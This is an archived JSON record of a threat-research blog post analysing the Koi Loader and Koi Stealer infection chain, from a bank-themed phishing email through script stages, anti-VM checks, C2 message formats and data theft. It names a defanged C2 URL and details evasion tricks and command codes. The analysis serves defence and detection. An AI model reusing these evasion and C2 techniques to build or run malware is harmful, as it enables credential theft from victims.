{
	"id": "560739f3-3ee3-4c46-8c0a-850ddaef62f0",
	"created_at": "2026-04-06T00:20:18.971601Z",
	"updated_at": "2026-04-10T03:20:31.908762Z",
	"deleted_at": null,
	"sha1_hash": "a508a3e674458047eccf4212b8fe348bc5b50a1a",
	"title": "Unraveling Not AZORult but Koi Loader: A Precursor to Koi Stealer",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 5452656,
	"plain_text": "Unraveling Not AZORult but Koi Loader: A Precursor to Koi\r\nStealer\r\nBy eSentire Threat Response Unit (TRU)\r\nArchived: 2026-04-05 16:43:37 UTC\r\nAdversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters\r\nand Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.\r\nWe have discovered some of the most dangerous threats and nation state attacks in our space – including the\r\nKaseya MSP breach and the more_eggs malware.\r\nOur Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced\r\nThreat Analytics driven by our Threat Response Unit – the TRU team.\r\nIn TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We\r\noutline how we responded to the confirmed threat and what recommendations we have going forward.\r\nHere’s the latest from our TRU Team…\r\nWhat did we find?\r\nAt the end of March 2024, the eSentire Threat Response Unit (TRU) detected an infection by the stealer malware\r\nallegedly being tracked by some researchers as AZORult.\r\nAZORult is an infostealer malware first discovered in 2016. AZORult's sales stopped at the end of 2018 and the\r\nseller announced the end of the project, which translates from Russian to English: \"Every piece of software has its\r\nlifespan. And for AZORult, it has come to an end. With both sadness and joy, I announce that sales are closed\r\nforever\" (Figure 1).\r\nFigure 1: CrydBrox announcement on closing the AZORult sales\r\nIn early 2019, Kaspersky unveiled details indicating that AZORult had been rewritten from Delphi to C++. Fast-forward to the beginning of 2024, Cyble and Netskope have reported on yet another resurgence of AZORult, but\r\nthis time with the code switched to .NET. However, a detailed comparison of Netskope’s, Cyble's, and\r\nKaspersky's samples showed no code overlaps.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 1 of 16\n\nA Threat Researcher, Ernesto Fernández from Trellix, highlighted an article that identifies the malware as Koi\r\nLoader and Koi Stealer, reflecting the analyses by Cyble and Netskope. These findings including the Twitter post\r\nfrom Unit42 and some discussions with Principle Threat Researcher at Palo Alto have led us to adopt the terms\r\nKoi Loader and Koi Stealer for this article's discussion.\r\nInitial Infection\r\nThe user received a phishing email about an unauthorized transaction on the sender's debit card containing an\r\nembedded link (Figure 2). This link directed the user to download a malicious ZIP archive named\r\n“chasebank_statement_mar.zip” (MD5: 8751223ced55a2079e876b893917a0f3). Notably, the file hashes of the\r\narchive change with each new download.\r\nFigure 2: Phishing email\r\nAs seen in Figure 3, we found multiple reports on the sender’s email on spam[.]org with email subject lines such\r\nas:\r\nConcerned about an ambiguous charge on my bank statement - seeking your help\r\nNeed your guidance with a puzzling payment on my credit card - could you advise\r\nUneasy about an unknown charge on my bank statement connected to your store - could you assist\r\nUnforeseen payment on my debit card linked to your website - looking for your guidance\r\nConcerned about an unforeseen charge on my account - appreciate your assistance\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 2 of 16\n\nFigure 3: Complaint report on spam[.]org\r\nUpon visiting the embedded malicious page that is hosted on Google Sites, we received a CAPTCHA prompt\r\n(Figure 4).\r\nFigure 4: CAPTCHA page on Google Sites\r\nIt’s worth noting that to receive the payload, the user would have to pass the CAPTCHA prompt first. If the user\r\nfails the CAPTCHA prompt, the server will respond with “NO” status (Figure 5).\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 3 of 16\n\nFigure 5: Response from the server if the CAPTCHA prompt fails\r\nIf the user passes the CAPTCHA prompt, the server responds with “YES” status and serves the ZIP archive.\r\nFigure 6: Response from the server if the CAPTCHA prompt is passed\r\nThe ZIP archive includes a shortcut file (.lnk) named “chasebank_statement_mar.lnk” (MD5:\r\n044fd3c4d97a35f80792b7edee445c48), which downloads the next stage payload from the server,\r\n“m8hHxtkVLYPw.bat” (MD5: 099259c6d898c5d91dc3b01756e349d8), using curl.\r\nThis file is then stored in the %TEMP% folder. Additionally, it establishes persistence on the system by creating a\r\nScheduled Task named “0BAduEnQZG9POyK”. (Figure 7).\r\nFigure 7: Contents of the shortcut file\r\nKoi payloads are usually all placed within the same opendir link, as shown in Figure 8.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 4 of 16\n\nFigure 8: Example of the opendir hosting Koi payloads\r\nThe download batch file “m8hHxtkVLYPw.bat” contains the PowerShell command (Figure 9) that is responsible\r\nfor fetching another payload from the server “WLXUL6LWXQPB.js” (MD5:\r\n48c7fd278ac590c9bd896ad9c7850c3a).\r\nFigure 9: Contents of the batch script\r\nThe downloaded JavaScript file is responsible for self-replication, the script checks if its current filename is\r\nagent.js. If not, it attempts to copy itself to the %programdata% directory with the filename agent.js. It defines a\r\nmutex name “7z2LKLJ62LPA” and attempts to delete any file with that name in the %temp% directory. If a file\r\nwith the mutex name does not exist (indicating that another instance may not be running), it proceeds to retrieve\r\nand execute additional payloads via PowerShell commands, as shown in Figure 10.\r\nFigure 10: Contents of the JavaScript file\r\nThe PowerShell script agent1.ps1 (MD5: 96b251e61f987648f69767f398324652) contains a one-liner command\r\nthat is responsible for AMSI bypass as shown in Figure 11.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 5 of 16\n\nFigure 11: AMSI bypass\r\nagent3.ps1 (MD5: a3ee8655f45c72f5231ded7a4a1c7e43) contains the instructions to download Koi loader written\r\nin C++ as well as loading the shellcode in a separate thread along with the loader. The shellcode is responsible for\r\nallocating the memory for the loader and jumping to the loader’s entry point (Figure 12).\r\nFigure 12: Shellcode that is responsible for accessing the loader at the entry point\r\nKoi Loader\r\nAnti-VM\r\nThe Koi Loader malware is written in C. The final loader payload is extracted and decrypted using XOR from the\r\nresource section, where the XOR key is also located.\r\nWe will proceed to the decrypted Koi payload. The loader begins by implementing the anti-CIS feature, which\r\nterminates the process if any of the languages listed in Figure 13 are detected.\r\nFigure 13: Anti-CIS / language check\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 6 of 16\n\nAdditionally, the loader employs an anti-VM capability. It uses EnumDisplayDevicesW to enumerate display\r\ndevices attached to the desktop, searching for device strings that match known virtual machine display adapters\r\n(Hyper-V, VMWare, Parallels, Red Hat QXL). It then checks for specific files related to VirtualBox\r\n(VBoxService.exe and VBoxTray.exe), indicating the system is running inside a VirtualBox VM.\r\nThe loader further inspects certain directories and files for evidence of a VM environment. This includes looking\r\nfor specific files in the user's system and application data folders, which may indicate automated testing or\r\nsandboxing environments, such as Recently.docx, Opened.docx, These.docx, Resource.txt, OpenVPN.txt (Figure\r\n14).\r\nFigure 14: VirutalBox and file checks\r\nNext, the loader retrieves the computer name and name of the currently logged-in user against WILLCARTER-PC, FORTI-PC, SFTOR-PC and Joe Cage, STRAZNJICA.GRUBUTT, Paul Jones, PJones, Harry Johnson,\r\nWDAGUtilityAccount, sal.rosenburg, and d5.vc/g accordingly. The computer name and username values can\r\nindicate automated analysis environments or generic usernames commonly used in virtual environments.\r\nGlobalMemoryStatusEx is called to retrieve the system's memory status. It checks if the total physical is greater\r\nthan or equal to 3050 MB. This check is performed to determine whether the system might be a VM or a typical\r\nend-user device, as analysis environments might allocate less memory to each VM instance.\r\nInterestingly, the Koi Loader performs checks on files with extensions like doc, docx, xls, and xlsx. It verifies that\r\nthese files are exactly 15 bytes in size and that their filenames contain 30 characters. Additionally, it assesses\r\nwhether the total number of files matching these criteria is 20 or fewer, and if it does, it proceeds with another\r\ncheck for the presence of powershell.exe in the process's executable path.\r\nIf all these conditions are met, the loader interprets it as a sign that it might be running in a controlled or analysis\r\nenvironment (Figure 15).\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 7 of 16\n\nFigure 15: File size and filename character check\r\nThe loader creates the mutex to avoid re-infection. The mutex creation algorithm is based on the calculations of\r\nthe Volume Serial Number with other constants in the code. The reproduced algorithm is shown in Figure 16.\r\nAdditional Analysis\r\nFigure 16: Mutex generation algorithm\r\nNext, the loader proceeds with setting the file attributes of agent.js that was previously mentioned to hidden via\r\nSetFileAttributesW as well as creating the scheduled task named “Firefox Default Browser Agent\r\n458046B0AF4A39CB” via ITaskScheduler interface that runs agent.js file via wscript.exe.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 8 of 16\n\nCommand and Control\r\nFor the initial check-in, Koi Loader sends the following to the C2 as an example:\r\n101|{GUID}|VoYGkc5R|pNL/LwrBZb5hBXeAiJ9/lLRrL0U4usTuqV2bGDMIRig=\r\nWhere “VoYGkc5R” is the hardcoded marker followed by a randomly generated Base64-encoded string (Figure\r\n17).\r\nFigure 17: Initial check-in with C2\r\nAfter the initial check-in, the infected machine sends another request containing the information gathered from the\r\nmachine, including OSMajorVersion, OSMinorVersion, OSBuildNumber, Username, ComputerName, and the\r\ndomain name if present. The collected information is then XOR'ed with a randomly generated 16-character value,\r\nwhich is subsequently processed via the modified MD5 algorithm and sent over to C2.\r\nFor the XOR key generation algorithm, the approach is to prepend a fixed byte sequence to the actual input data\r\nbefore hashing. This customizes the MD5 hashing process, making the output distinct from hashing the input\r\nalone with a standard MD5 algorithm. This customization affects how the data is processed and, consequently, the\r\nfinal hash.\r\nThe secondary POST request format:\r\n111|{GUID}|{XOR’ed host information}\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 9 of 16\n\nFigure 18: Secondary POST request with the host information\r\nNext, the loader proceeds to check if NET Framework 2.0.50727 compiler exists on the infected host and if it\r\nexists, it downloads and executes “sd2.ps1” (MD5: 4f55be0b55ec67dfda42b88e9c743a2a) script from the server\r\nvia PowerShell.\r\nIf the .NET 2.0 compiler does not exist, it then checks for the presence of .NET Framework 4.0.30319 compiler.\r\nIf this exists, the loader proceeds to download the \"sd4.ps1\" (MD5: 607b42bd61902ad5a5ea9f508e18a5a4) script\r\ninstead (Figure 19).\r\nFigure 19: Retrieving sd4.ps1 or sd2.ps1 scripts based on .NET Framework versions\r\nWe will analyze the \"sd2.ps1\" and \"sd4.ps1\" payloads later in this article. Now, let's return to the command-and-control part.\r\nIf the host receives the \"INIT\" response from the server, it resubmits the check-in to the server, as illustrated in\r\nFigure 17, appending the GUID value and a Base64-encoded string to the POST request. Otherwise, the host waits\r\nfor additional tasks from the C2 server, with a one-minute sleep interval between each connection.\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 10 of 16\n\nThe list of commands/tasks is shown below:\r\nCommand Description\r\n0x67 Executes scripts/commands via Command Prompt\r\n0x68 Executes scripts/commands via PowerShell\r\n0x69 Enables system shutdown privilege for the running process and performs the shutdown\r\n0x6A Creates a scheduled task to run agent.js and removes agent.js if present on the host\r\n0x6C Establishes communication with a C2 server\r\n0x6E\r\nPerforms process injection into either explorer.exe or certutil.exe based on the subsystem value\r\n(if the subsystem is Console User Interface, the payload is injected into certutil.exe, if it’s\r\nGraphical User Interface, the payload is injected into explorer.exe) or writes the payload to\r\n%TEMP% folder and directly executes it (the naming convention for the payload is generated\r\nwith PRNG)\r\n0x70\r\nDynamically loads and executes a function from a DLL, in our sample, the export function is\r\n“Release”\r\nKoi Stealer\r\nThe retrieved scripts “sd2.ps1” and “sd4.ps1” include code for decrypting the final Koi Stealer binary using XOR,\r\nas well as for executing the binary with “config” parameters received from the C2 server.\r\nThe XOR key is obtained from the C2 server at the URL hxxp://91.202.233[.]209/index.php?\r\nid=$guid\u0026subid=px8eIkut, where $guid represents the GUID of the infected machine (refer to Figure 20).\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 11 of 16\n\nFigure 20: Snippet of “sd2.ps1” and “sd4.ps1” scripts\r\nIt's worth noting that the decrypted Koi Stealer payload exhibits similar anti-VM capabilities to those previously\r\nmentioned in the loader (see Figure 21).\r\nFigure 21: Anti-vm capabilities (Final Koi Stealer)\r\nKoi Stealer copies sensitive data, including cookies, history, and login information, to the %AppData% folder. For\r\neach copied file, it generates a unique GUID as a naming convention. The files are then immediately deleted after\r\ntheir contents have been fully processed (Figure 22).\r\nFigure 22: Removing the copied files after processing\r\nYou can access the list of collected data for exfiltration on GitHub.\r\nIn the loader component, the program searches for the distinct identifier \"LDR,\" retrieves commands from the C2\r\nserver, decodes them from Base64, and decrypts them using XOR with a shared secret as the key.\r\nSubsequently, the secondary payload is downloaded from a URL provided by the C2 server and executed. The\r\nmessages will be logged for successful or failed execution in the errors.txt file and sent over to C2 (Figure 23).\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 12 of 16\n\nFigure 23: Logged messages\r\nKoi Stealer collects the build ID of the payload, in our case it’s the second position of the previously mentioned\r\n“config”, which is “px8eIkut”, basic system information such as PC name, current username, GUID, GPU and\r\nCPU information, total visible RAM size, screen resolution, system configuration (system language, architecture,\r\noperating system), security software, installed applications and save them to a system.txt.\r\nThe infostealer generates a private-public key pair and a shared secret using the Curve25519 algorithm, then\r\ncompresses the harvested data using GZip and encrypts it with XOR, employing the shared secret as the\r\nencryption key. Subsequently, it sends the data to the C2 server, with the POST request beginning with the public\r\nkey, succeeded by a delimiter of 0x4b, and then the encrypted, compressed data (Figure 24).\r\nFigure 24: Transmitted data\r\nWhat can you learn from this TRU Positive?\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 13 of 16\n\nPhishing emails remain a key vector for malware distribution, demonstrating the continuous threat of social\r\nengineering attacks and the need for ongoing vigilance.\r\nThe utilization of anti-VM capabilities by malware like Koi Loader and Koi Stealer highlights the attempts\r\nof modern threats to evade analysis and detection by analysts and researchers.\r\nThe case emphasizes the necessity of multi-layered security measures, including up-to-date antivirus or\r\nEndpoint Detection and Response (EDR) tools, to detect and block malicious activities.\r\nImplementing Phishing and Security Awareness Training (PSAT) programs is crucial to educate employees\r\nabout emerging threats and mitigate the risk of successful social engineering attacks.\r\nThe use of obfuscation and sophisticated delivery mechanisms by malware underscores the importance of\r\nimplementing comprehensive detection strategies, including script logging and behavior-based detection\r\nmechanisms, to identify and mitigate threats.\r\nWhat did we do?\r\nOur 24/7 SOC Cyber Analysts investigated the suspicious activities, notified the customer, and isolated the\r\naffected device.\r\nRecommendations from our Threat Response Unit (TRU) Team:\r\nEnsure that all endpoints are protected with up-to-date antivirus software or Endpoint Detection and\r\nResponse (EDR) tool capable of detecting and blocking malicious files.\r\nImplement a Phishing and Security Awareness Training (PSAT) program that educates and informs your\r\nemployees on emerging threats in the threat landscape.\r\nWe recommend modifying the default 'open-with' settings for script files, ensuring they open with a basic\r\ntext editor like Notepad instead of executing.\r\nMonitor unusual network traffic patterns, such as specific user-agent strings and data being sent used by\r\nmalware to communicate with Command and Control (C2) servers, to identify potential compromises.\r\nDetection Rules\r\nYou can access the detection rules here.\r\nIndicators of Compromise\r\nYou can access the indicators of compromise here.\r\nReferences\r\nhttps://securelist.com/azorult-analysis-history/89922/\r\nhttps://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1\r\nhttps://twitter.com/Unit42_Intel/status/1775891118963503288\r\nhttps://x.com/RussianPanda9xx/...\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 14 of 16\n\nhttps://www.netskope.com/blog/...\r\nhttps://cyble.com/blog/sneaky-azorult-back-in-action-and-goes-undetected/\r\nhttps://github.com/RussianPanda95/Yara-Rules/tree/main/Koi\r\nhttps://github.com/esThreatIntelligence/iocs/blob/main/Koi/iocs_4-4-2024.txt\r\nhttps://github.com/esThreatIntelligence/iocs/blob/main/Koi/data_collected.txt\r\nTo learn how your organization can build cyber resilience and prevent business disruption with eSentire’s Next\r\nLevel MDR, connect with an eSentire Security Specialist now.\r\nGET STARTED\r\nABOUT ESENTIRE’S THREAT RESPONSE UNIT (TRU)\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 15 of 16\n\nThe eSentire Threat Response Unit (TRU) is an industry-leading threat research team committed to helping your\r\norganization become more resilient. TRU is an elite team of threat hunters and researchers that supports our 24/7\r\nSecurity Operations Centers (SOCs), builds threat detection models across the eSentire XDR Cloud Platform, and\r\nworks as an extension of your security team to continuously improve our Managed Detection and Response\r\nservice. By providing complete visibility across your attack surface and performing global threat sweeps and\r\nproactive hypothesis-driven threat hunts augmented by original threat research, we are laser-focused on defending\r\nyour organization against known and unknown threats.\r\nSource: https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nhttps://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer\r\nPage 16 of 16",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.esentire.com/blog/unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer"
	],
	"report_names": [
		"unraveling-not-azorult-but-koi-loader-a-precursor-to-koi-stealer"
	],
	"threat_actors": [],
	"ts_created_at": 1775434818,
	"ts_updated_at": 1775791231,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.pdf",
		"text": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.txt",
		"img": "https://archive.orkl.eu/a508a3e674458047eccf4212b8fe348bc5b50a1a.jpg"
	}
}